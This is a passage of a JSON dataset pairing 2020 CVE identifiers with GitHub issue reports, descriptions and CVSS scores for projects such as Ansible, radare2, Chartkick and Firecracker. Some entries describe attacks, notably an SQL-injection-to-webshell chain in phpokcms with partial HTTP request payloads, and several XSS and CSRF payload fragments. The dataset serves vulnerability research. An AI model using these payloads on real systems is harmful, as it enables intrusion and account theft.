  48927. "description": "CSS injection with width and height options. The Chartkick Ruby gem is vulnerable to CSS injection if user input is passed to the width or height option. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact Chartkick is vulnerable to CSS injection if user input is passed to the width or height option. APITAG An attacker can set additional CSS properties, like: APITAG All users running an affected release should upgrade. Technical Details Chartkick used APITAG to escape the width and height. This prevents XSS, but does not escape semicolons, which allows CSS additional properties to be set. Chartkick now limits width and height values to alphanumeric and % (this prevents some valid values like APITAG but keeps things simple).",
  48928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48929. "severity": "MEDIUM",
  48930. "baseScore": 6.1,
  48931. "impactScore": 2.7,
  48932. "exploitabilityScore": 2.8
  48933. },
  48934. {
  48935. "CVE_ID": "CVE-2020-16269",
  48936. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/17383",
  48937. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/17383",
  48938. "Repo_new": "radareorg/radare2",
  48939. "Issue_Created_At": "2020-07-31T00:14:52Z",
  48940. "description": "FILETAG",
  48941. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48942. "severity": "MEDIUM",
  48943. "baseScore": 5.5,
  48944. "impactScore": 3.6,
  48945. "exploitabilityScore": 1.8
  48946. },
  48947. {
  48948. "CVE_ID": "CVE-2020-16610",
  48949. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/53",
  48950. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/53",
  48951. "Repo_new": "havok89/hoosk",
  48952. "Issue_Created_At": "2020-04-12T01:21:37Z",
  48953. "description": "CSRF issue that allows attacker to delete an account. Hi,bro.I also find an csrf issue in admin page. When attacker induce authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention. how to reproduce the issue NUMBERTAG Login to admin APITAG NUMBERTAG Keep login and access the html it has following content CODETAG userid is very easy to guess. APITAG account userid = userid is delete without admin user's intention. how to fix this issue. set csrf token to protect delete function.",
  48954. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  48955. "severity": "MEDIUM",
  48956. "baseScore": 4.3,
  48957. "impactScore": 1.4,
  48958. "exploitabilityScore": 2.8
  48959. },
  48960. {
  48961. "CVE_ID": "CVE-2020-16629",
  48962. "Issue_Url_old": "https://github.com/Gh0stF/phpok_cve/issues/1",
  48963. "Issue_Url_new": "https://github.com/gh0stf/phpok_cve/issues/1",
  48964. "Repo_new": "gh0stf/phpok_cve",
  48965. "Issue_Created_At": "2020-02-06T05:33:40Z",
  48966. "description": "phpokcms Sqli To Getshell. Problem location: Here is the injection point framework / API / APITAG The main operation is to save the file upload information to the database. $upload = $this >lib('upload') >upload('upfile'); if (!$upload || !$upload FILETAG FILETAG You can see this Sql information: INSERT INTO qinggan_res ( APITAG , folder , name , ext , filename , addtime , title , APITAG , attr , APITAG , APITAG ) VALUES( PATHTAG ) Then the injection point has appeared, using method: APITAG can call the controller and its methods through FILETAG , and there is an attachment replacement method at PATHTAG which queries the old file name from the database, then deletes the corresponding file to the disk, and adds the newly uploaded file. We can see the key method of attachment replacement It is located in framework / LIBS / APITAG NUMBERTAG as follows: public function mv($old,$new,$recover=true) { if(!file_exists($old)){ return false; } if(substr($new NUMBERTAG this >make($new,\"dir\"); }else{ $this >make($new,\"file\"); } if(file_exists($new)){ if($recover){ unlink($new); }else{ return false; } }else{ $new = APITAG } rename($old,$new); return true; } As you can see, although it's an attachment replacement, it doesn't matter if the source attachment doesn't exist. It's still written normally. So the idea from injection to getshell is: inject an attachment data through SQL, the file type is PHP, and then call the attachment replacement function through FILETAG , you can write a PHP file to the target path. Then payload is as follows POST APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Origin: FILETAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG APITAG DNT NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: / Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh; APITAG US; APITAG Connection: close APITAG Content Disposition: form data; name=\"id\" WU_FILE NUMBERTAG APITAG Content Disposition: form data; name=\"name\" FILETAG APITAG Content Disposition: form data; name=\"type\" FILETAG FILETAG However , In the upload part, there are two bytes of file header detection FILETAG So we need to add two bytes of picture header, URL encoded as NUMBERTAG p So payload is like this POST APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Origin: FILETAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG APITAG DNT NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: / Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh; APITAG US; APITAG Connection: close APITAG Content Disposition: form data; name=\"id\" WU_FILE NUMBERTAG APITAG Content Disposition: form data; name=\"name\" FILETAG APITAG Content Disposition: form data; name=\"type\" image/png APITAG Content Disposition: form data; APITAG Wed Sep NUMBERTAG GMT NUMBERTAG APITAG Standard Time) APITAG Content Disposition: form data; name=\"size NUMBERTAG APITAG Content Disposition: form data; name=\"upfile\"; APITAG Content Type: image/png \u0089P APITAG APITAG FILETAG Boom! We can see the APITAG is really successfully output on page ! FILETAG",
  48967. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48968. "severity": "CRITICAL",
  48969. "baseScore": 9.8,
  48970. "impactScore": 5.9,
  48971. "exploitabilityScore": 3.9
  48972. },
  48973. {
  48974. "CVE_ID": "CVE-2020-16632",
  48975. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/12",
  48976. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/12",
  48977. "Repo_new": "ky-j/dedecms",
  48978. "Issue_Created_At": "2020-04-29T17:32:07Z",
  48979. "description": "XSS and CSRF Vulnerability exists in the file of APITAG NUMBERTAG SP2 version. When common user send this malicious URL to the web manager and request it, the web manager could be executed the malicious javascript code FILETAG",
  48980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  48981. "severity": "MEDIUM",
  48982. "baseScore": 5.4,
  48983. "impactScore": 2.7,
  48984. "exploitabilityScore": 2.3
  48985. },
  48986. {
  48987. "CVE_ID": "CVE-2020-16843",
  48988. "Issue_Url_old": "https://github.com/firecracker-microvm/firecracker/issues/2057",
  48989. "Issue_Url_new": "https://github.com/firecracker-microvm/firecracker/issues/2057",
  48990. "Repo_new": "firecracker-microvm/firecracker",
  48991. "Issue_Created_At": "2020-08-03T09:01:39Z",
  48992. "description": "Firecracker NUMBERTAG and NUMBERTAG network stack can freeze under heavy ingress traffic. We have identified an issue in the Firecracker NUMBERTAG and NUMBERTAG irtio net emulation. Issue Description Under heavy network ingress traffic, when the host TAP interface's receive queue is not drained and the guest virtio net device's receive queue is full, the APITAG network interface ingress can freeze. There is no possibility to recover from this state, resulting in a denial of service on the APITAG when it is configured with a single network interface, and causing an availability problem for the APITAG network interface on which the issue is triggered. This issue is difficult to reproduce with TCP traffic. The TCP congestion algorithm makes it harder to fill both the TAP interface and virtio receive queues. Impact When this issue is triggered, the guest kernel network interface will no longer receive packets. Vulnerable Systems Firecracker releases NUMBERTAG and NUMBERTAG are affected.",
  48993. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48994. "severity": "MEDIUM",
  48995. "baseScore": 5.9,
  48996. "impactScore": 3.6,
  48997. "exploitabilityScore": 2.2
  48998. },
  48999. {
  49000. "CVE_ID": "CVE-2020-1733",
  49001. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67791",
  49002. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67791",
  49003. "Repo_new": "ansible/ansible",
  49004. "Issue_Created_At": "2020-02-26T19:46:31Z",
  49005. "description": "Insecure creation of temporary directory for become_user. SUMMARY CVETAG We create a temporary directory for the APITAG with APITAG in APITAG without first checking if the directory exists and that it has the expected permissions. Relevant code URLTAG We need to validate the parent directories are as expected before creating directories in those paths and fail if the permissions and/or ACLs are not what we expect. ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49006. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L",
  49007. "severity": "MEDIUM",
  49008. "baseScore": 5.0,
  49009. "impactScore": 3.7,
  49010. "exploitabilityScore": 0.8
  49011. },
  49012. {
  49013. "CVE_ID": "CVE-2020-1734",
  49014. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67792",
  49015. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67792",
  49016. "Repo_new": "ansible/ansible",
  49017. "Issue_Created_At": "2020-02-26T19:48:32Z",
  49018. "description": "pipe lookup plugin enables shell by default. SUMMARY CVETAG The pipe lookup plugin should use APITAG be default to avoid potential privilege escalation. A new option should provide a way to enable APITAG . If a variable is passed to the pipe lookup, that variable could be overriden via facts, leading to arbitrary code execution. Relevant code: URLTAG It seems like this change was made intentionally quite a while ago ( URLTAG Changing the default will probably break a lot of things for people. \ud83d\ude1e ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49019. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L",
  49020. "severity": "HIGH",
  49021. "baseScore": 7.4,
  49022. "impactScore": 6.0,
  49023. "exploitabilityScore": 0.8
  49024. },
  49025. {
  49026. "CVE_ID": "CVE-2020-1735",
  49027. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67793",
  49028. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67793",
  49029. "Repo_new": "ansible/ansible",
  49030. "Issue_Created_At": "2020-02-26T19:50:23Z",
  49031. "description": "Fetch module path traversal. SUMMARY CVETAG Possibly related to CVETAG ( URLTAG The fetch module takes the source result from the slurp module, which came from the remote host. We don't really validate this path and it could have been manipulated by the remote host in a malicious way such that we end up a path similar to APITAG for the source. This allows an attacker to place a file the contents of which they control. Relevant Code: URLTAG Suggested correction from the reporter: Don't use APITAG to compute the destination file or clean the last argument add the following check: CODETAG ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49032. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
  49033. "severity": "MEDIUM",
  49034. "baseScore": 4.6,
  49035. "impactScore": 2.7,
  49036. "exploitabilityScore": 1.5
  49037. },
  49038. {
  49039. "CVE_ID": "CVE-2020-1736",
  49040. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67794",
  49041. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67794",
  49042. "Repo_new": "ansible/ansible",
  49043. "Issue_Created_At": "2020-02-26T19:54:05Z",
  49044. "description": "The default permissions used by atomic_move create files that are world readable . SUMMARY CVETAG If a file doesn't exist, we create it with APITAG permissions combined with the current umask . Depending on the default umask as well as the permissions on the destination directory, this could result in world readable files. Relevant code: Default permissions: URLTAG creation in APITAG : URLTAG ERRORTAG Suggested correction is to use more restrictive permissions by default and/or add a mechanism to prevent creating wold readable files. ISSUE TYPE Bug Report COMPONENT NAME ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49045. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  49046. "severity": "LOW",
  49047. "baseScore": 3.3,
  49048. "impactScore": 1.4,
  49049. "exploitabilityScore": 1.8
  49050. },
  49051. {
  49052. "CVE_ID": "CVE-2020-17366",
  49053. "Issue_Url_old": "https://github.com/NLnetLabs/routinator/issues/319",
  49054. "Issue_Url_new": "https://github.com/nlnetlabs/routinator/issues/319",
  49055. "Repo_new": "nlnetlabs/routinator",
  49056. "Issue_Created_At": "2020-04-28T14:53:53Z",
  49057. "description": "Missing files don't result in a Manifest/PP being considered invalid. In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain APITAG files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is parsable, CRL exists is valid (also not expired), and manifest is signed with keys not revoked by the CRL), and references files which do not exist in the repository at hand, the publication point should be considered compromised. So in the case of APNIC where an End User (self hosted) RPKI publication point misses a few .roa files, the validator can proceed to consider all data from all RPs it could reach eligible for further validation, except any data from the publication point where files were missing. In other words: if one or a few files are missing from the repository, the repository should be considered 'down', and no attempt should be made to start guessing what can be salvaged and what not. To offer an example: In manifest APITAG , a number of ROAs and a CRL are referenced: CODETAG If an attacker withholds all but APITAG , so the MITM does the equivalent of: CODETAG and the validator does not consider APITAG in its entirety invalid due to one or more missing APITAG or APITAG files, in this specific example the remaining ROA will render all BGP announcements equal to or covered under APITAG invalid . This results in actual downtime in real networks. If the manifest (which references a missing APITAG file in its entirety is ignored or considered invalid), the remaining APITAG ROA which would've been transformed into VRP APITAG is also ignored. This renders all BGP announcements under that NUMBERTAG APITAG rather than invalid , which is a preferable situation. APITAG now has a patch where if a file is referenced the manifest, but is missing (either due to CA operational error, or because of a MITM attack we can't differentiate the two), that specific manifest is considered invalid. It will depend on the structure of how CA Certificate trees whether this measure is sufficient or whether a single missing file has to result in the entire publication point being considered invalid. But until we have more information about other attack vectors, I recommend that a manifest as a whole is considered invalid, when it references a non existing or wrongly checksummed file. The onus is on the CA publication points to publish correct valid RPKI data, the validator's can't be expected to compensate for CA operator errors (or MITM attacks) An additional check is needed: if one of the .roa files a manifest references is corrupt (the MITM didn't _delete_ strategically file, but filled some .roa files with garbage): ERRORTAG corrupting that one .roa file results in an incomplete (operationally problematic) set of VRPs: CODETAG In the above eaxmple there should be NUMBERTAG RPs in total, APITAG contained NUMBERTAG RPs. In summary: If a manifests references a non existing file, or if there is a checksum mismatch between the hash described in the manifest and the hash as derived from the .roa file, the RP MUST consider the whole manifest invalid and not produce VRPs with the remaining .roa files.",
  49058. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  49059. "severity": "HIGH",
  49060. "baseScore": 7.4,
  49061. "impactScore": 5.2,
  49062. "exploitabilityScore": 2.2
  49063. },
  49064. {
  49065. "CVE_ID": "CVE-2020-1737",
  49066. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67795",
  49067. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67795",
  49068. "Repo_new": "ansible/ansible",
  49069. "Issue_Created_At": "2020-02-26T19:55:42Z",
  49070. "description": "win_unzip path traversal with specially crafted archive. SUMMARY CVETAG A specially crafted zip archive could result in path traversal in the ERRORTAG module. The APITAG function doesn't check if the extracted path belongs to the destination folder. A possible solution is to FILETAG . ISSUE TYPE Bug Report COMPONENT NAME ERRORTAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49071. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  49072. "severity": "HIGH",
  49073. "baseScore": 7.8,
  49074. "impactScore": 5.9,
  49075. "exploitabilityScore": 1.8
  49076. },
  49077. {
  49078. "CVE_ID": "CVE-2020-1738",
  49079. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67796",
  49080. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67796",
  49081. "Repo_new": "ansible/ansible",
  49082. "Issue_Created_At": "2020-02-26T19:57:02Z",
  49083. "description": "package and service modules allow arbitrary modules to be executed . SUMMARY CVETAG Both package and service modules use facts to determine the name of the module to run if use is not passed to the module. The APITAG and APITAG facts could be set to another module name or a module name installed in a collection such as APITAG , which would allow arbitrary code execution on the managed node. A potential fix would be to whitelist valid modules for package and service and/or have the collection loader validate the collection path to not allow arbitrary files. The collection loader part may already be fixed in NUMBERTAG ISSUE TYPE Bug Report COMPONENT NAME APITAG APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49084. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L",
  49085. "severity": "LOW",
  49086. "baseScore": 3.9,
  49087. "impactScore": 2.7,
  49088. "exploitabilityScore": 0.8
  49089. },
  49090. {
  49091. "CVE_ID": "CVE-2020-1739",
  49092. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67797",
  49093. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67797",
  49094. "Repo_new": "ansible/ansible",
  49095. "Issue_Created_At": "2020-02-26T19:58:52Z",
  49096. "description": "Command used in subversion module is problematic. SUMMARY CVETAG The password is used in the svn command that is run by the subversion module. The password should be passed in via some other mechanism other than as a parameter to avoid the password being read at APITAG on the managed node. Problematic code: URLTAG ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml subversion: repo: PATHTAG dest: /src/checkout checkout: no update: no password: \"{{ vault_svn_pass }}\" EXPECTED RESULTS Password is not visible. ACTUAL RESULTS Password can be observed at APITAG on the managed node.",
  49097. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
  49098. "severity": "LOW",
  49099. "baseScore": 3.9,
  49100. "impactScore": 2.5,
  49101. "exploitabilityScore": 1.3
  49102. },
  49103. {
  49104. "CVE_ID": "CVE-2020-1740",
  49105. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67798",
  49106. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67798",
  49107. "Repo_new": "ansible/ansible",
  49108. "Issue_Created_At": "2020-02-26T20:00:23Z",
  49109. "description": "ansible vault edit race condition. SUMMARY CVETAG A race condition exists in APITAG which could allow another user on the same computer can read the old and new secret. When executing APITAG , the method APITAG creates the temporary file with APITAG . However, the returned file descriptor is closed and APITAG is called to write to the file. APITAG will delete the file and recreate it. A malicious user can create the file with permissions allowing them access to the file after the unlink. The proposed solution is to write directly to the file descriptor in APITAG rather than deleting and creating a new file. Relevant code: URLTAG ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49110. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  49111. "severity": "MEDIUM",
  49112. "baseScore": 4.7,
  49113. "impactScore": 3.6,
  49114. "exploitabilityScore": 1.0
  49115. },
  49116. {
  49117. "CVE_ID": "CVE-2020-17479",
  49118. "Issue_Url_old": "https://github.com/manvel-khnkoyan/jpv/issues/10",
  49119. "Issue_Url_new": "https://github.com/manvel-khnkoyan/jpv/issues/10",
  49120. "Repo_new": "manvel-khnkoyan/jpv",
  49121. "Issue_Created_At": "2020-08-06T20:07:51Z",
  49122. "description": "Validation Bypass. Hello, I'm a security researcher at Sonatype, and I discovered a potential vulnerability in this project. Do you have a preferred way for me to share the details privately, or do you want me to just show you what I've got on this APITAG issue?",
  49123. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49124. "severity": "CRITICAL",
  49125. "baseScore": 9.8,
  49126. "impactScore": 5.9,
  49127. "exploitabilityScore": 3.9
  49128. },
  49129. {
  49130. "CVE_ID": "CVE-2020-17487",
  49131. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/17431",
  49132. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/17431",
  49133. "Repo_new": "radareorg/radare2",
  49134. "Issue_Created_At": "2020-08-09T11:24:28Z",
  49135. "description": "FILETAG",
  49136. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  49137. "severity": "HIGH",
  49138. "baseScore": 7.5,
  49139. "impactScore": 3.6,
  49140. "exploitabilityScore": 3.9
  49141. },
  49142. {
  49143. "CVE_ID": "CVE-2020-17495",
  49144. "Issue_Url_old": "https://github.com/celery/django-celery-results/issues/142",
  49145. "Issue_Url_new": "https://github.com/celery/django-celery-results/issues/142",
  49146. "Repo_new": "celery/django-celery-results",
  49147. "Issue_Created_At": "2020-04-13T19:27:43Z",
  49148. "description": "Question: Disable storing of task arguments. Hi, apologies if this is documented somewhere (I can't find it), but is there a quick way not to store the arguments that were passed to the celery task? Some of my tasks contain potentially sensitive information, and I would prefer not to have a permanent record of them inside of my database (I'm also looking at encrypting this information, but would prefer not to store it regardless).",
  49149. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49150. "severity": "HIGH",
  49151. "baseScore": 7.5,
  49152. "impactScore": 3.6,
  49153. "exploitabilityScore": 3.9
  49154. },
  49155. {
  49156. "CVE_ID": "CVE-2020-17541",
  49157. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392",
  49158. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392",
  49159. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  49160. "Issue_Created_At": "2019-12-05T13:46:42Z",
  49161. "description": "report a stack buffer overflow security issue. There' s a stack buffer overflow in encode_one_block function, the backtrace of the crash point is below. The version is the latest from the git main branch: APITAG ERRORTAG poc URLTAG",
  49162. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  49163. "severity": "HIGH",
  49164. "baseScore": 8.8,
  49165. "impactScore": 5.9,
  49166. "exploitabilityScore": 2.8
  49167. },
  49168. {
  49169. "CVE_ID": "CVE-2020-17542",
  49170. "Issue_Url_old": "https://github.com/dotCMS/core/issues/16890",
  49171. "Issue_Url_new": "https://github.com/dotcms/core/issues/16890",
  49172. "Repo_new": "dotcms/core",
  49173. "Issue_Created_At": "2019-07-19T03:44:10Z",
  49174. "description": "APITAG NUMBERTAG stored xss vul.. hi, I've found a xss vul on APITAG NUMBERTAG it allows remote attackers to insert js code and print APITAG screenshots below. FILETAG FILETAG FILETAG",
  49175. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49176. "severity": "MEDIUM",
  49177. "baseScore": 5.4,
  49178. "impactScore": 2.7,
  49179. "exploitabilityScore": 2.3
  49180. },
  49181. {
  49182. "CVE_ID": "CVE-2020-17551",
  49183. "Issue_Url_old": "https://github.com/ImpressCMS/impresscms/issues/659",
  49184. "Issue_Url_new": "https://github.com/impresscms/impresscms/issues/659",
  49185. "Repo_new": "impresscms/impresscms",
  49186. "Issue_Created_At": "2020-06-18T23:49:04Z",
  49187. "description": "Stored XSS on APITAG NUMBERTAG Payload = APITAG APITAG Vulnerable URL PATHTAG Vulnerable APITAG : ID of the [adsense tag to display this ad] Vulnerable URL PATHTAG Vulnerable APITAG : Name Reference URLTAG",
  49188. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49189. "severity": "MEDIUM",
  49190. "baseScore": 4.8,
  49191. "impactScore": 2.7,
  49192. "exploitabilityScore": 1.7
  49193. },
  49194. {
  49195. "CVE_ID": "CVE-2020-18035",
  49196. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/8",
  49197. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/8",
  49198. "Repo_new": "zchuanzhao/jeesns",
  49199. "Issue_Created_At": "2018-12-24T07:48:19Z",
  49200. "description": "\u53cd\u5c04\u578bxss. \u60a8\u597d\uff1a APITAG APITAG FILETAG \u867d\u7136\u9879\u76ee\u4e2d\u5b58\u5728xss\u62e6\u622a\u5668 FILETAG APITAG",
  49201. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49202. "severity": "MEDIUM",
  49203. "baseScore": 6.1,
  49204. "impactScore": 2.7,
  49205. "exploitabilityScore": 2.8
  49206. },
  49207. {
  49208. "CVE_ID": "CVE-2020-18065",
  49209. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/16",
  49210. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/16",
  49211. "Repo_new": "popojicms/popojicms",
  49212. "Issue_Created_At": "2019-01-06T15:52:51Z",
  49213. "description": "The APITAG NUMBERTAG has xss in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG edit menu FILETAG NUMBERTAG open and input exp \"> APITAG alert(\"xss\") APITAG FILETAG APITAG the id parameter",
  49214. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49215. "severity": "MEDIUM",
  49216. "baseScore": 5.4,
  49217. "impactScore": 2.7,
  49218. "exploitabilityScore": 2.3
  49219. },
  49220. {
  49221. "CVE_ID": "CVE-2020-18066",
  49222. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/42",
  49223. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/42",
  49224. "Repo_new": "94fzb/zrlog",
  49225. "Issue_Created_At": "2019-01-08T09:46:27Z",
  49226. "description": "There is a stored XSS in the frontend which hacker can escalate of Privileges. APITAG is a stored XSS in ther front end which hack can escalate of Privileges. when we access url below: APITAG FILETAG we can see there contains a comment modul\uff0cit does't check the user input,so when we submit the comment form with the palyoad below,this stored xss will be happened. payload :\u201c> APITAG Requested data packet : ERRORTAG when the cross site script successful executed,we can see the cookie of the frontend viewr's was been stolen. FILETAG And more seriously,when the admin log in the backend and access the comment manage module,it will cause the cross site script excute which submit by APITAG after that,the cookie of the admin will be stolen,and the hacker will use the cookie to escalate of Privileges. FILETAG suggestions: APITAG the parameter in the comment form below: APITAG APITAG a global interceptor to filtered the parameter input from APITAG use the entity encode to encode the parameter,to avoid the use of label such as '<' or '>'. Hope you guy fix this flaw quickly,if you have some request,please contact me with the email below: EMAILTAG",
  49227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49228. "severity": "MEDIUM",
  49229. "baseScore": 6.1,
  49230. "impactScore": 2.7,
  49231. "exploitabilityScore": 2.8
  49232. },
  49233. {
  49234. "CVE_ID": "CVE-2020-18070",
  49235. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/46",
  49236. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/46",
  49237. "Repo_new": "idreamsoft/iCMS",
  49238. "Issue_Created_At": "2019-01-08T16:00:58Z",
  49239. "description": "A vulnerability that can delete any folder in the server. The APITAG method in APITAG does not filter the input content ,it can be used to delete any folder in the server. FILETAG FILETAG And there's also a small problem. When deleting the backup file, only the backup folder is deleted, and the zip file is not deleted. The database file can be downloaded directly (It's hard to get the APITAG FILETAG",
  49240. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  49241. "severity": "CRITICAL",
  49242. "baseScore": 9.1,
  49243. "impactScore": 5.2,
  49244. "exploitabilityScore": 3.9
  49245. },
  49246. {
  49247. "CVE_ID": "CVE-2020-18084",
  49248. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/9",
  49249. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/9",
  49250. "Repo_new": "yzmcms/yzmcms",
  49251. "Issue_Created_At": "2019-01-25T15:40:33Z",
  49252. "description": "There is a XSS vulnerability discovered in yzmcms NUMBERTAG ss payload: \"> APITAG alert NUMBERTAG APITAG <\" POC: CODETAG Execute payload when login is successful FILETAG",
  49253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49254. "severity": "MEDIUM",
  49255. "baseScore": 6.1,
  49256. "impactScore": 2.7,
  49257. "exploitabilityScore": 2.8
  49258. },
  49259. {
  49260. "CVE_ID": "CVE-2020-18102",
  49261. "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/3",
  49262. "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/3",
  49263. "Repo_new": "fantasticlbp/hotels_server",
  49264. "Issue_Created_At": "2019-01-23T16:31:32Z",
  49265. "description": "XSS Vulnerability in FILETAG . In FILETAG FILETAG As you see, there are not any filtration in all \u2018echo\u2019s. Also in FILETAG , these are inserted into database without filtration FILETAG After all, we can enjoy XSS FILETAG FILETAG",
  49266. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49267. "severity": "MEDIUM",
  49268. "baseScore": 6.1,
  49269. "impactScore": 2.7,
  49270. "exploitabilityScore": 2.8
  49271. },
  49272. {
  49273. "CVE_ID": "CVE-2020-18106",
  49274. "Issue_Url_old": "https://github.com/FeMiner/wms/issues/7",
  49275. "Issue_Url_new": "https://github.com/feminer/wms/issues/7",
  49276. "Repo_new": "feminer/wms",
  49277. "Issue_Created_At": "2019-03-13T11:23:13Z",
